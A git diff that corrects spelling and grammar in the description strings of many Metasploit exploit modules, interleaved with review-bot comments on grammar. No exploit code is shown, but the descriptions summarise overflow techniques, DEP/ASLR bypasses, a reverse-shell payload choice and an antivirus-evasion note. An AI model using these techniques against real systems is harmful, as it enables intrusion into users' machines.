@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'RealNetworks RealPlayer CDDA URI Initialization Vulnerability', 'Description' => %q{ - This module exploits a initialization flaw within RealPlayer 11/11.1 and + This module exploits an initialization flaw within RealPlayer 11/11.1 and RealPlayer SP 1.0 - 1.1.4. An abnormally long CDDA URI causes an object initialization failure. However, this failure is improperly handled and uninitialized memory executed. diff --git a/modules/exploits/windows/browser/safari_xslt_output.rb b/modules/exploits/windows/browser/safari_xslt_output.rb index 83a3be2b05..47e00c37e7 100644 --- a/modules/exploits/windows/browser/safari_xslt_output.rb +++ b/modules/exploits/windows/browser/safari_xslt_output.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote rendering engine. It is possible to redirect the output of a XSLT transformation to an arbitrary file. The content of the created file must be ASCII or UTF-8. The destination path can be relative or absolute. This module - has been tested on Safari and Maxthon. Code execution can be acheived by first + has been tested on Safari and Maxthon. Code execution can be achieved by first uploading the payload to the remote machine in VBS format, and then upload a MOF file, which enables Windows Management Instrumentation service to execute the VBS. }, diff --git a/modules/exploits/windows/browser/teechart_pro.rb b/modules/exploits/windows/browser/teechart_pro.rb index aac0992ff7..fd67c1afa1 100644 --- a/modules/exploits/windows/browser/teechart_pro.rb +++ b/modules/exploits/windows/browser/teechart_pro.rb 
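Review bot: The sentence completed by the context lines after the fixed `an initialization flaw` in realplayer_cdda_uri.rb is missing a verb: `this failure is improperly handled and uninitialized memory executed` should read `and uninitialized memory is executed`. It is within the same hunk and is the kind of slip this sweep is meant to catch.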
@@ -12,9 +12,9 @@ class MetasploitModule < Msf::Exploit::Remote super( update_info(info, 'Name' => 'TeeChart Professional ActiveX Control Trusted Integer Dereference', 'Description' => %q{ - This module exploits a integer overflow in TeeChart Pro ActiveX control. When + This module exploits an integer overflow in TeeChart Pro ActiveX control. When sending an overly large/negative integer value to the AddSeries() property of - TeeChart2010.ocx, the code will perform an arithemetic operation that wraps the + TeeChart2010.ocx, the code will perform an arithmetic operation that wraps the value and is later directly trusted and called upon. This module has been designed to bypass DEP only under IE8 with Java support. Multiple diff --git a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb index c8acda7aa9..8dbb835630 100644 --- a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb +++ b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb @@ -27,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote ActiveX control installed with Tom Sawyer GET Extension Factory due to an incorrect initialization under Internet Explorer. - While the Tom Sawyer GET Extension Factory is installed with some versions of VMware + While the Tom Sawyer GET Extension Factory is installed with some versions of VMware Infrastructure Client, this module has been tested only with the versions installed with Embarcadero Technologies ER/Studio XE2 / Embarcadero Studio Portal 1.6. The ActiveX control tested is tsgetx71ex553.dll, version 5.5.3.238. diff --git a/modules/exploits/windows/browser/webex_ucf_newobject.rb b/modules/exploits/windows/browser/webex_ucf_newobject.rb index 16b9b36426..74fb2ee7ef 100644 --- a/modules/exploits/windows/browser/webex_ucf_newobject.rb +++ b/modules/exploits/windows/browser/webex_ucf_newobject.rb 
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in WebEx's WebexUCFObject - ActiveX Control. If an long string is passed to the 'NewObject' method, a stack- + ActiveX Control. If a long string is passed to the 'NewObject' method, a stack- based buffer overflow will occur when copying attacker-supplied data using the sprintf function. diff --git a/modules/exploits/windows/browser/winamp_playlist_unc.rb b/modules/exploits/windows/browser/winamp_playlist_unc.rb index d3496d898d..4efaa2d865 100644 --- a/modules/exploits/windows/browser/winamp_playlist_unc.rb +++ b/modules/exploits/windows/browser/winamp_playlist_unc.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Winamp Playlist UNC Path Computer Name Overflow', 'Description' => %q{ This module exploits a vulnerability in the Winamp media player. - This flaw is triggered when a audio file path is specified, inside a + This flaw is triggered when an audio file path is specified, inside a playlist, that consists of a UNC path with a long computer name. This module delivers the playlist via the browser. This module has only been successfully tested on Winamp 5.11 and 5.12. diff --git a/modules/exploits/windows/browser/winamp_ultravox.rb b/modules/exploits/windows/browser/winamp_ultravox.rb index b556a58675..e823d18b73 100644 --- a/modules/exploits/windows/browser/winamp_ultravox.rb +++ b/modules/exploits/windows/browser/winamp_ultravox.rb 
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack buffer overflow in Winamp 5.24. By sending an overly long artist tag, a remote attacker may be able to execute arbitrary code. This vulnerability can be - exploited from the browser or the winamp client itself. + exploited from the browser or the Winamp client itself. }, 'Author' => 'MC', 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/windvd7_applicationtype.rb b/modules/exploits/windows/browser/windvd7_applicationtype.rb index be93a9c190..f17e6e490b 100644 --- a/modules/exploits/windows/browser/windvd7_applicationtype.rb +++ b/modules/exploits/windows/browser/windvd7_applicationtype.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in IASystemInfo.dll ActiveX - control in InterVideo WinDVD 7. By sending a overly long string + control in InterVideo WinDVD 7. By sending an overly long string to the "ApplicationType()" property, an attacker may be able to execute arbitrary code. }, diff --git a/modules/exploits/windows/browser/wmi_admintools.rb b/modules/exploits/windows/browser/wmi_admintools.rb index 0b884daf6c..b69c9f884d 100644 --- a/modules/exploits/windows/browser/wmi_admintools.rb +++ b/modules/exploits/windows/browser/wmi_admintools.rb @@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote opt-in to ASLR. As such, this module should be reliable on all Windows versions. - The WMI Adminsitrative Tools are a standalone download & install (linked in the + The WMI Administrative Tools are a standalone download & install (linked in the references). }, diff --git a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb index 21d8c4da32..83de2ea8fa 100644 
--- a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb +++ b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => "X360 VideoPlayer ActiveX Control Buffer Overflow", 'Description' => %q{ This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the - X360 Software. By setting an overly long value to 'ConvertFile()',an attacker can overrun + X360 Software. By setting an overly long value to 'ConvertFile()', an attacker can overrun a .data buffer to bypass ASLR/DEP and finally execute arbitrary code. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb index 25b3d6da7b..dacbde4f95 100644 --- a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb +++ b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the Yahoo! Messenger ActiveX - Control (YVerInfo.dll <= 2006.8.24.1). By sending a overly long string + Control (YVerInfo.dll <= 2006.8.24.1). By sending an overly long string to the "fvCom()" method from a yahoo.com domain, an attacker may be able to execute arbitrary code. }, diff --git a/modules/exploits/windows/browser/yahoomessenger_server.rb b/modules/exploits/windows/browser/yahoomessenger_server.rb index 69a61dcbd4..f4f5de1970 100644 --- a/modules/exploits/windows/browser/yahoomessenger_server.rb +++ b/modules/exploits/windows/browser/yahoomessenger_server.rb 
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX Control (ywcupl.dll) provided by Yahoo! Messenger version 8.1.0.249. - By sending a overly long string to the "Server()" method, and then calling + By sending an overly long string to the "Server()" method, and then calling the "Send()" method, an attacker may be able to execute arbitrary code. Using the payloads "windows/shell_bind_tcp" and "windows/shell_reverse_tcp" yield for the best results. diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb index b83e93a2a8..82bbcc2541 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb @@ -24,9 +24,9 @@ class MetasploitModule < Msf::Exploit::Remote streams with certain MAPI attachment properties, it is possible to set a path name to files to be executed. When a user double clicks on such an attachment or message, Outlook will proceed to execute the file that is set by the path name value. These - files can be local files, but also file stored remotely for example on a file share. - Exploitation is limited by the fact that its is not possible for attackers to supply - command line options. + files can be local files, but also files stored remotely (on a file share, for example) + can be used. Exploitation is limited by the fact that it is not possible for attackers + to supply command line options. }, 'Author' => 'Yorick Koster ', 'References' => diff --git a/modules/exploits/windows/fileformat/abbs_amp_lst.rb b/modules/exploits/windows/fileformat/abbs_amp_lst.rb index 49b79010d8..1fa5321339 100644 --- a/modules/exploits/windows/fileformat/abbs_amp_lst.rb +++ b/modules/exploits/windows/fileformat/abbs_amp_lst.rb 
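Review bot: The rewritten sentence in ms10_045_outlook_ref_only.rb has two subjects and reads awkwardly: `These files can be local files, but also files stored remotely (on a file share, for example) can be used.` A tighter form that says the same thing is `These files can be local, or stored remotely (on a file share, for example).` The remaining rewrite, `it is not possible for attackers to supply command line options`, is fine as written.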
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Description' => %q{
 This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability occurs when adding a specially crafted .lst file, allowing arbitrary code execution with the privileges
- of the user running the application . This module has been tested successfully on
+ of the user running the application. This module has been tested successfully on
 ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.
 },
 'License' => MSF_LICENSE,
diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb
index 80a28ed8a2..643d6b5656 100644
--- a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb
+++ b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
 NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various
- Windows versions due a the hardcoded syscall number.
+ Windows versions due to a hardcoded syscall number.
 },
 'License' => MSF_LICENSE,
 'Author' =>
diff --git a/modules/exploits/windows/fileformat/adobe_toolbutton.rb b/modules/exploits/windows/fileformat/adobe_toolbutton.rb
index f5ecab3566..b411f7b954 100644
--- a/modules/exploits/windows/fileformat/adobe_toolbutton.rb
+++ b/modules/exploits/windows/fileformat/adobe_toolbutton.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'Adobe Reader ToolButton Use After Free',
 'Description' => %q{
- This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6
+ This module exploits a use after free condition on Adobe Reader versions 11.0.2, 10.1.6
 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where the cEnable callback can be used to early free the object memory. Later use of the object allows triggering the use after free condition. This module has been tested successfully
diff --git a/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb b/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb
index 1298adb9f4..c2f2504e2a 100644
--- a/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb
+++ b/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb
@@ -13,8 +13,8 @@ class MetasploitModule < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => "Apple Quicktime 7 Invalid Atom Length Buffer Overflow",
 'Description' => %q{
- This module exploits a vulnerability found in Apple Quicktime. The flaw is
- triggered when Quicktime fails to properly handle the data length for certain
+ This module exploits a vulnerability found in Apple QuickTime. The flaw is
+ triggered when QuickTime fails to properly handle the data length for certain
 atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer overflow by loading a specially crafted .mov file, and allows arbitrary code execution under the context of the current user. Please note: Since an egghunter
diff --git a/modules/exploits/windows/fileformat/audiotran_pls.rb b/modules/exploits/windows/fileformat/audiotran_pls.rb
index bf1e3297e4..7e03983186 100644
--- a/modules/exploits/windows/fileformat/audiotran_pls.rb
+++ b/modules/exploits/windows/fileformat/audiotran_pls.rb
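Review bot: The QuickTime hunk's unchanged context line still reads "which may result a buffer overflow", and the same omission survives on the new `+` line of the aviosoft_plf_buf.rb hunk further down ("which may result arbitrary code execution"); both are missing "in", which the commit itself adds in the dvdx_plf_bof.rb hunk. Since the commit is already reflowing these descriptions, I would fold the two in: `which may result in a buffer overflow` and `which may result in arbitrary code execution under`. The %q{ description block these lines belong to continues past the end of the hunk in both files.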
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
 This module exploits a stack-based buffer overflow in Audiotran 1.4.1.
 An attacker must send the file to victim and the victim must open the file.
 Alternatively it may be possible to execute code remotely via an embedded
- PLS file within a browser, when the PLS extention is registered to Audiotran.
+ PLS file within a browser, when the PLS extension is registered to Audiotran.
 This functionality has not been tested in this module.
 },
 'License' => MSF_LICENSE,
diff --git a/modules/exploits/windows/fileformat/audiotran_pls_1424.rb b/modules/exploits/windows/fileformat/audiotran_pls_1424.rb
index 597b63d501..2fca6c6c67 100644
--- a/modules/exploits/windows/fileformat/audiotran_pls_1424.rb
+++ b/modules/exploits/windows/fileformat/audiotran_pls_1424.rb
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
 This module exploits a stack-based buffer overflow in Audiotran 1.4.2.4.
 An attacker must send the file to victim and the victim must open the file.
 Alternatively, it may be possible to execute code remotely via an embedded
- PLS file within a browser when the PLS extention is registered to Audiotran.
+ PLS file within a browser when the PLS extension is registered to Audiotran.
 This alternate vector has not been tested and cannot be exercised directly with this module.
 },
diff --git a/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb b/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb
index c5c522c35b..7d466420ce 100644
--- a/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb
+++ b/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Description' => %q{
 This module exploits a vulnerability found in Aviosoft Digital TV Player Pro version 1.x. An overflow occurs when the process copies the content of a
- playlist file on to the stack, which may result aribitrary code execution under
+ playlist file on to the stack, which may result arbitrary code execution under
 the context of the user.
 },
 'License' => MSF_LICENSE,
diff --git a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb
index d77b63f7a7..bc24157d7b 100644
--- a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb
+++ b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit
 'Name' => "Beetel Connection Manager NetConfig.ini Buffer Overflow",
 'Description' => %q{
 This module exploits a stack-based buffer overflow on Beetel Connection Manager. The
- vulnerability exists in the parising of the UserName parameter in the NetConfig.ini
+ vulnerability exists in the parsing of the UserName parameter in the NetConfig.ini
 file. The module has been tested successfully on PCW_BTLINDV1.0.0B04 over Windows XP SP3 and Windows 7 SP1.
 },
diff --git a/modules/exploits/windows/fileformat/ca_cab.rb b/modules/exploits/windows/fileformat/ca_cab.rb
index 86a0680b7f..f4df94d914 100644
--- a/modules/exploits/windows/fileformat/ca_cab.rb
+++ b/modules/exploits/windows/fileformat/ca_cab.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Name' => 'CA Antivirus Engine CAB Buffer Overflow',
 'Description' => %q{
 This module exploits a stack buffer overflow in CA eTrust Antivirus 8.1.637.
- By creating a specially crafted CAB file, an an attacker may be able
+ By creating a specially crafted CAB file, an attacker may be able
 to execute arbitrary code.
 },
 'License' => MSF_LICENSE,
diff --git a/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb b/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb
index e6e068b02b..f9c0f711cd 100644
--- a/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb
+++ b/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
 This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening a m3u playlist with a long track name, a SEH exception record can be overwritten with parts of the controllable buffer. SEH execution is triggered after an
- invalid read of an injectible address, thus allowing arbitrary code execution.
+ invalid read of an injectable address, thus allowing arbitrary code execution.
 This module works on multiple Windows platforms including: Windows XP SP3, Windows Vista, and Windows 7.
 },
diff --git a/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb b/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb
index c81f162437..2ce52112f9 100644
--- a/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb
+++ b/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
 This module exploits a buffer overflow vulnerability found in Chasys Draw IES (version 4.10.01). The vulnerability exists in the module flt_BMP.dll, while parsing BMP files, where the ReadFile function is used to store user provided data
- on the stack in a insecure way. It results in arbitrary code execution under the
+ on the stack in an insecure way. It results in arbitrary code execution under the
 context of the user viewing a specially crafted BMP file. This module has been tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7 SP1.
diff --git a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
index 2ec583c7b7..cb33d3ef1d 100644
--- a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
+++ b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
 This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is similar except an additional SpecialFolderDataBlock is included. The folder ID set
- in this SpecialFolderDataBlock is set to the Control Panel. This is enought to bypass
+ in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass
 the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary DLL file.
 },
diff --git a/modules/exploits/windows/fileformat/deepburner_path.rb b/modules/exploits/windows/fileformat/deepburner_path.rb
index a6191aa48b..fe3d7691d4 100644
--- a/modules/exploits/windows/fileformat/deepburner_path.rb
+++ b/modules/exploits/windows/fileformat/deepburner_path.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
 1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc).
 An attacker must send the file to victim and the victim must open the file.
 Alternatively it may be possible to execute code remotely via an embedded
- DBR file within a browser, since the DBR extention is registered to DeepBurner.
+ DBR file within a browser, since the DBR extension is registered to DeepBurner.
 },
 'License' => MSF_LICENSE,
 'Author' =>
diff --git a/modules/exploits/windows/fileformat/dvdx_plf_bof.rb b/modules/exploits/windows/fileformat/dvdx_plf_bof.rb
index 0bd6a579a2..3b14db3dd2 100644
--- a/modules/exploits/windows/fileformat/dvdx_plf_bof.rb
+++ b/modules/exploits/windows/fileformat/dvdx_plf_bof.rb
@@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote
 This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and Standard. By supplying a long string of data in a plf file (playlist), the MediaPlayerCtrl.dll component will attempt to extract a filename out of the string,
- and then copy it on the stack without any proper bounds checking, which casues a
- buffer overflow, and results arbitrary code execution under the context of the user.
+ and then copy it on the stack without any proper bounds checking, which causes a
+ buffer overflow, and results in arbitrary code execution under the context of the user.
 This module has been designed to target common Windows systems such as: Windows XP SP2/SP3, Windows Vista, and Windows 7.
diff --git a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb
index 90f519af7f..5651182f92 100644
--- a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb
+++ b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb
@@ -12,8 +12,8 @@ class MetasploitModule < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow',
 'Description' => %q{
- This module exploits a stack buffer overflow in the KeyWorks KeyHelp Activex Control
- (KeyHelp.ocx 1.2.3120.0). This Activex Control comes bundled with EMC's
+ This module exploits a stack buffer overflow in the KeyWorks KeyHelp ActiveX Control
+ (KeyHelp.ocx 1.2.3120.0). This ActiveX Control comes bundled with EMC's
 Documentation ApplicationXtender 5.4.
 },
 'License' => MSF_LICENSE,
diff --git a/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb b/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb
index d03f35da23..0b9cf634b0 100644
--- a/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb
+++ b/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Description' => %q{
 This module exploits a buffer overflow vulnerability found in ERS Viewer 2011 (version 11.04). The vulnerability exists in the module ermapper_u.dll where the
- function ERM_convert_to_correct_webpath handles user provided data in a insecure
+ function ERM_convert_to_correct_webpath handles user provided data in an insecure
 way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. This module has been tested successfully with ERS Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.
diff --git a/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb b/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb
index 9b66759feb..bf27a30630 100644
--- a/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb
+++ b/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Description' => %q{
 This module exploits a buffer overflow vulnerability found in ERS Viewer 2013. The vulnerability exists in the module ermapper_u.dll, where the function
- rf_report_error handles user provided data in a insecure way. It results in
+ rf_report_error handles user provided data in an insecure way. It results in
 arbitrary code execution under the context of the user viewing a specially crafted .ers file. This module has been tested successfully with ERS Viewer 2013 (versions 13.0.0.1151) on Windows XP SP3 and Windows 7 SP1.
diff --git a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb
index 0df68d115f..fd32c41ba7 100644
--- a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb
+++ b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Name' => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow',
 'Description' => %q{
 This module exploits a stack buffer overflow in HTML Help Workshop 4.74
- By creating a specially crafted hhp file, an an attacker may be able
+ By creating a specially crafted hhp file, an attacker may be able
 to execute arbitrary code.
 },
 'License' => MSF_LICENSE,
diff --git a/modules/exploits/windows/fileformat/homm3_h3m.rb b/modules/exploits/windows/fileformat/homm3_h3m.rb
index 27becb3a0b..f73c16b86e 100644
--- a/modules/exploits/windows/fileformat/homm3_h3m.rb
+++ b/modules/exploits/windows/fileformat/homm3_h3m.rb
@@ -14,9 +14,9 @@ class MetasploitModule < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'Heroes of Might and Magic III .h3m Map file Buffer Overflow',
 'Description' => %q{
- This module embeds an exploit into an ucompressed map file (.h3m) for
+ This module embeds an exploit into an uncompressed map file (.h3m) for
 Heroes of Might and Magic III. Once the map is started in-game, a
- buffer overflow occuring when loading object sprite names leads to
+ buffer overflow occurring when loading object sprite names leads to
 shellcode execution.
 },
 'License' => MSF_LICENSE,
diff --git a/modules/exploits/windows/fileformat/ibm_pcm_ws.rb b/modules/exploits/windows/fileformat/ibm_pcm_ws.rb
index d019940329..bcb783a8e6 100644
--- a/modules/exploits/windows/fileformat/ibm_pcm_ws.rb
+++ b/modules/exploits/windows/fileformat/ibm_pcm_ws.rb
@@ -32,9 +32,9 @@ class MetasploitModule < Msf::Exploit::Remote
 saved RETURN address at offset 0x6c is overwritten by the data written past the buffer. To ensure we can perform arbitrary code execution we must we provide a valid pointer at
- 0x74 which is used as a argument for the called function at 0x675751ED as a id file
+ 0x74 which is used as an argument for the called function at 0x675751ED as an id file
 extension parameter. Once the caller regains control we will reach our RETURN. The Ret
- instruction will be used to pop the overwritten saved return address which was currupted.
+ instruction will be used to pop the overwritten saved return address which was corrupted.
 This exploit has been written to bypass 2 mitigations DEP and ASLR on a Windows platform.
diff --git a/modules/exploits/windows/fileformat/icofx_bof.rb b/modules/exploits/windows/fileformat/icofx_bof.rb
index b8c077826b..ca331f261f 100644
--- a/modules/exploits/windows/fileformat/icofx_bof.rb
+++ b/modules/exploits/windows/fileformat/icofx_bof.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Name' => 'IcoFX Stack Buffer Overflow',
 'Description' => %q{
 This module exploits a stack-based buffer overflow vulnerability in version 2.1
- of IcoFX. The vulnerability exists while parsing .ICO files, where an specially
+ of IcoFX. The vulnerability exists while parsing .ICO files, where a specially
 crafted ICONDIR header providing an arbitrary long number of images in the file can be used to trigger the overflow when reading the ICONDIRENTRY structures.
 },
diff --git a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb
index 69c7b6b75b..55d9ea8665 100644
--- a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb
+++ b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
 This module exploits a stack buffer overflow in versions v9.7 through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of IDEAL Migration. All versions are suspected to be vulnerable.
- By creating a specially crafted ipj file, an an attacker may be able
+ By creating a specially crafted ipj file, an attacker may be able
 to execute arbitrary code.
 NOTE: IDEAL Administration 10.5 is compiled with /SafeSEH
diff --git a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb
index 25671a1821..3578da270b 100644
--- a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb
+++ b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb
@@ -18,8 +18,8 @@ class MetasploitModule < Msf::Exploit::Remote
 The ShowReport() function (located in the myCIOScn.dll ActiveX component) fails to check the FileName argument, and passes it on to a ShellExecuteW() function, therefore allows any malicious attacker to execute any process that's on the
- local system. However, if the victim machine is connected to a remote share (
- or something similiar), then it's also possible to execute arbitrary code.
+ local system. However, if the victim machine is connected to a remote share
+ (or something similar), then it's also possible to execute arbitrary code.
 Please note that a custom template is required for the payload, because the default Metasploit template is detectable by McAfee -- any Windows binary, such as calc.exe or notepad.exe, should bypass McAfee fine.
diff --git a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb
index 78737e1c96..90471410e1 100644
--- a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb
+++ b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
 This module exploits a stack-based buffer overflow in Millenium MP3 Studio 2.0.
 An attacker must send the file to victim and the victim must open the file.
 Alternatively it may be possible to execute code remotely via an embedded
- PLS file within a browser, when the PLS extention is registered to Millenium MP3 Studio.
+ PLS file within a browser, when the PLS extension is registered to Millenium MP3 Studio.
 This functionality has not been tested in this module.
 },
 'License' => MSF_LICENSE,
diff --git a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb
index 2a628a4b61..2bde64298e 100644
--- a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb
+++ b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Name' => 'MJM Core Player 2011 .s3m Stack Buffer Overflow',
 'Description' => %q{
 This module exploits a stack buffer overflow in MJM Core Player 2011
- When opening a malicious s3m file in this applications, a stack buffer overflow can be
+ When opening a malicious s3m file in this application, a stack buffer overflow can be
 triggered, resulting in arbitrary code execution. This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.
 },
diff --git a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb
index 499ada665d..9d13c5f2a5 100644
--- a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb
+++ b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb
@@ -14,11 +14,11 @@ class MetasploitModule < Msf::Exploit::Remote
 'Description' => %q{
 This module exploits a stack-based buffer overflow found in the handling of SAMI subtitles files in MPlayer SVN Versions before 33471. It currently
- targets SMPlayer 0.6.8, which is distributed with a vulnerable version of mplayer.
+ targets SMPlayer 0.6.8, which is distributed with a vulnerable version of MPlayer.
 The overflow is triggered when an unsuspecting victim opens a movie file first, followed by loading the malicious SAMI subtitles file from the GUI. Or, it can also
- be done from the console with the mplayer "-sub" option.
+ be done from the console with the MPlayer "-sub" option.
 },
 'License' => MSF_LICENSE,
